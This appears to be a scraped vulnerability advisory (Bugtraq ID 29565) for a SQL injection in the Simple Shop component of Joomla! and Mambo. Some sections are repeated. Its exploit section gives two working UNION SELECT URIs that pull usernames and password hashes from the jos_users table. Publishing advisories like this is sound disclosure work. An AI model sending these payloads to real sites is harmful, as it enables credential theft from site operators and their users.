Joomla! and Mambo Simple Shop Component 'catid' Parameter SQL Injection Vulnerability
BID:29565
Info
Joomla! and Mambo Simple Shop Component 'catid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 29565 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-2568 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 05 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | His0k4 |
| Vulnerable: |
Galore Simple Shop 3.4 |
| Not Vulnerable: | |
Discussion
Joomla! and Mambo Simple Shop Component 'catid' Parameter SQL Injection Vulnerability
The Simple Shop component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Simple Shop 3.4 and prior versions are vulnerable.
The Simple Shop component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Simple Shop 3.4 and prior versions are vulnerable.
Exploit / POC
Joomla! and Mambo Simple Shop Component 'catid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
The following additional example URI from eXeCuTeR is available:
http://www.example.com/index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
The following additional example URI from eXeCuTeR is available:
http://www.example.com/index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
Solution / Fix
Joomla! and Mambo Simple Shop Component 'catid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Joomla! and Mambo Simple Shop Component 'catid' Parameter SQL Injection Vulnerability
References:
References:
- Mambo Homepage (Mambo)
- Simple Shop Vendor Homepage (Galore)